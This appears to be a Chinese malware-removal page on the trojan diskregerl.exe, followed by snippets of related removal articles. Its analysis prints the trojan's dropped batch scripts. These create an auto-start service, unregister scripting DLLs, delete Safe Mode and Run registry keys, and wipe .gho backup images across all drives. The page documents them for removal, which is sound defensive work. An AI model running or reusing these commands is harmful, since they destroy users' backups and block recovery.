diskregerl.exe(Trojan.Agent.cdt)病毒手动查杀_病毒查杀

文件MD5:e98a4571cf72b798077d12d6c4894629
行为分析:
1、拷贝文件:
C:\windows\system32\diskregerl.exe  45,056 字节
2、无添加启动项举动。
3、释放2个批处理:
内容分别为:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 创建网络连接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 开始.wav"
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤独更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二个:
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、连接网站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外该病毒可能恶意锁定IE主页,不过未实现。
解决方法:
1、重启计算机。
2、删除文件:
C:\windows\system32\diskregerl.exe
3、如果重启后病毒无法删除,请下载冰刃(该软件可到down.45it.com下载),结束其进程。

时间: 2024-07-29 02:18:20

diskregerl.exe(Trojan.Agent.cdt)病毒手动查杀_病毒查杀的相关文章

关于最近出现logo1_.exe基本介绍和清除技巧_病毒查杀

其实呢,大家只需要装个最新的毒霸,基本就不会出现问题,如果你的电脑出现了问题,你一定用了瑞星了,瑞星在这方面的杀毒能力实在有限,建议大家去金山下个毒霸,我以前用瑞星就经常中毒,自从用了毒霸就没见过这样的情况.非广告啊关于 logo1_.exe基本介绍:病毒名称:worm@w32.looked 病毒别名:virus.win32.delf.62976 , w32/hllp.philis.j ,w32.looked  net-worm.win32.zorin.a 病毒型态:worm (网络蠕虫) 病毒

详细解说iexplore.exe是进程还是病毒不知所云_病毒查杀

iexplore.exe是Microsoft Internet Explorer的主程序.这个微软Windows应用程序让你在网上冲浪,和访问本地Interanet网络.这不是纯粹的系统程序,但是如果终止它,可能会导致不可知的问题.iexplore.exe同时也是Avant网络浏览器的一部分,这是一个免费的基于Internet Explorer的浏览器.注意iexplore.exe也有可能是Trojan.KillAV.B病毒,该病毒会终止你的反病毒软件,和一些Windows系统工具,该进程的安全

木马程序Trojan-Spy.Win32.Agent.cfu清除方法_病毒查杀

木马程序Trojan-Spy.Win32.Agent.cfu 该样本程序是一个使用Delphi编写的程序,程序采用MEW 1.x加壳企图躲避特征码扫描,长度为67,908字节,图标为windows默认图标,病毒扩展名为exe,主要传播途径网页挂马.文件捆绑.黑客攻击. 病毒分析 该样本程序被激活后释放systen.dll文件到%systemroot%\system32目录下,释放451062.dll文件(该文件名为6位或7位随机数字)到%systemroot%目录下,运行批处理删除自身: 添加注

WinFormA9.exe、kvmxcis.exe、cilpnoi.exe、duvadvm.exe“飘雪变种“的清除技巧_病毒查杀

"飘雪变种lz"(Win32.Troj.Dropper.lz.21920)这是一个飘雪变种.该病毒会产生随机的病毒文件,分别产生在%systemdir%.%drivers%.%temp%下. 通过生成的病毒文件,从网络上下载隐蔽软件.当用户再次启动机器时,桌面会消失,因为病毒进程在禁止系统 的某些进程启动. "禁闭杀软114688"(Worm.Delf.114688)该病毒是蠕虫病毒,当用户运行后,病毒会通过互联网悄然的下载大量病毒到系统盘的主要 目录下,包括%wi

国外杀软曝恶性桌面蠕虫病毒 金山毒霸已率先查杀

有媒体源引国外杀毒厂商F-Securer官方博客文章,称Windows远程桌面蠕虫morto正在传播,可能让黑客远程取得网友电脑控制权.金山毒霸在8月初已捕获该样本实施查杀,并且内置的防黑墙也可完全拦截黑客攻击. 据金山毒霸安全工程师介绍,这个被称作Morto的蠕虫病毒,是黑客攻击远程桌面服务的一种蠕虫病毒,其行为非常类似于中国黑客常用的3389批量抓鸡工具.今年8月初在中国境内已经出现该病毒,并且金山毒霸也率先实施了查杀. 图1 金山毒霸云数据库检索发现8月8日即可查杀Morto蠕虫病毒 "M

setup.exe microsoft.exe SP00LV.exe手动查杀_病毒查杀

释放 c:\setup.exe  Size: 28,672 bytes  c:\Documents and Settings\user\Local Settings\Temp\rs.bat  Size: 105 bytes  %windir%\system32\microsoft.exe  Size: 28,672 bytes  %windir%\system32\SP00LV.exe  Size: 28,672 bytes  %windir%\system32\drivers\svchost.

1sass.exe,winnet.sys,2pwsdor.sys,k87wovjoq.sys病毒清除_病毒查杀

一同学求助.U盘中毒感染机器,导致打开"我的电脑"看不到任何磁盘分区,且系统卡到假死态. 首先,通过组策略关闭"自动播放"功能.插入U盘. 执行:开始--运行--浏览,找到对应的U盘分区,复制Icesword和sreng. 更改Icesword软件名称,更改名称为任意名称,双击,系统蓝屏自动重启.在BIOS画面卡住.按重启键依旧,则断开主机电源片刻,再开机能正常进入. sreng扫描日志,发现如下可疑内容: =============================

chenzi.exe的分析及解决方法_病毒查杀

File size: 18593 bytes  MD5: c595bc161e1d64b4d8f4d84139ef02b0  SHA1: 100e8a9ae7034b41443e4ddaa46f175adb70eb06  病毒名称:未知 测试时间:2007-3-10 更新时间:明晚将更新此分析日志, 运行后病毒样本,自动删除病毒本身,自动释放病毒到%system%目录下 %system%\del.bat %system%\msgcom.dll %system%\1.exe %system%\2.

AutoRun.wp(gg.exe)U盘木马清除方法_病毒查杀

文件名称:gg.exe 文件大小:65607 byte AV命名: Worm.Win32.AutoRun.wp  卡巴斯基 Worm.Delf.65607  金山毒霸 Win32.HLLW.Autoruner.548   Dr.WEB 加壳方式:未 编写语言:Microsoft Visual C++ 6.0 文件MD5:33d493af096ef2fa6e1885a08ab201e6 行为分析: 1.  释放病毒文件: C:\WINDOWS\gg.exe  65607 字节 2.  添加启动项: